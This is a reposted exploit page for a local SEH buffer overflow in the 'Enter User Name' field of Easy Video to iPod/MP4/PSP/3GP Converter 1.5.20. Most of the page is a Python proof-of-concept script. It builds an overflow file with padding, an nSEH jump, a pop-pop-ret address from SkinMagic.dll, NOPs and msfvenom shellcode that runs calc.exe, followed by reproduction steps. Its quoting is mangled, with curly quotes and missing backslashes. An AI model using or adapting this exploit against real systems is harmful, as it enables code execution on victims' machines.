Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 Buffer Overflow

0
52
Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 Buffer Overflow

Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 Buffer Overflow
Exploit 

Published
Credit
Risk
2017.08.25
Anurag Srivastava
High
CWE
CVE
Local
Remote
CWE-119
N/A
Yes
No

#!/usr/bin/python
###############################################################################
# Exploit Title: Easy Video to iPod/MP4/PSP/3GP Converter 1.5.20 -‘Enter User Name’Field Buffer Overflow (SEH)
# Date: 24-08-2017
# Exploit Author: Anurag Srivastava
# Website: www.pyramidcyber.com
# Vulnerable Software: Easy Video to iPod/MP4/PSP/3GP Converter
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 1.5.20
# Software Link: http://www.divxtodvd.net/easy_ipod_mp4_psp_3gp.exe
# Tested On: Windows 7 x64
#
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the”Enter User Name”field, paste the content of pyramid.txt
#
##############################################################################
buffer =”x41″* 1008
nSEH =”xebx10x90x90″
# 0x10037859 : pop esi # pop ebx # ret 0x04 | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
SEH =”x59x78x03x10″
badchars =”x00x0ax0d”# and 0x80 to 0xff
# msfvenom -p windows/exec CMD=calc.exe -b”x00x0ax0d”-f python
buf =””
buf +=”xdaxd7xd9x74x24xf4xbax07xc8xf9x11x5ex2b”
buf +=”xc9xb1x31x31x56x18x03x56x18x83xeexfbx2a”
buf +=”x0cxedxebx29xefx0exebx4dx79xebxdax4dx1d”
buf +=”x7fx4cx7ex55x2dx60xf5x3bxc6xf3x7bx94xe9″
buf +=”xb4x36xc2xc4x45x6ax36x46xc5x71x6bxa8xf4″
buf +=”xb9x7exa9x31xa7x73xfbxeaxa3x26xecx9fxfe”
buf +=”xfax87xd3xefx7ax7bxa3x0exaax2axb8x48x6c”
buf +=”xccx6dxe1x25xd6x72xccxfcx6dx40xbaxfexa7″
buf +=”x99x43xacx89x16xb6xacxcex90x29xdbx26xe3″
buf +=”xd4xdcxfcx9ex02x68xe7x38xc0xcaxc3xb9x05″
buf +=”x8cx80xb5xe2xdaxcfxd9xf5x0fx64xe5x7exae”
buf +=”xabx6cxc4x95x6fx35x9exb4x36x93x71xc8x29″
buf +=”x7cx2dx6cx21x90x3ax1dx68xfexbdx93x16x4c”
buf +=”xbdxabx18xe0xd6x9ax93x6fxa0x22x76xd4x5e”
buf +=”x69xdbx7cxf7x34x89x3dx9axc6x67x01xa3x44″
buf +=”x82xf9x50x54xe7xfcx1dxd2x1bx8cx0exb7x1b”
buf +=”x23x2ex92x7fxa2xbcx7exaex41x45xe4xae”
nops =”x90″* 16
badchars =”x0ax0d”
data = buffer + nSEH + SEH + nops + buf
f = open (“pyramid.txt”,”w”)
f.write(data)
f.close()

TINGGALKAN KOMENTAR

Silakan masukkan komentar anda!
Silakan masukkan nama Anda di sini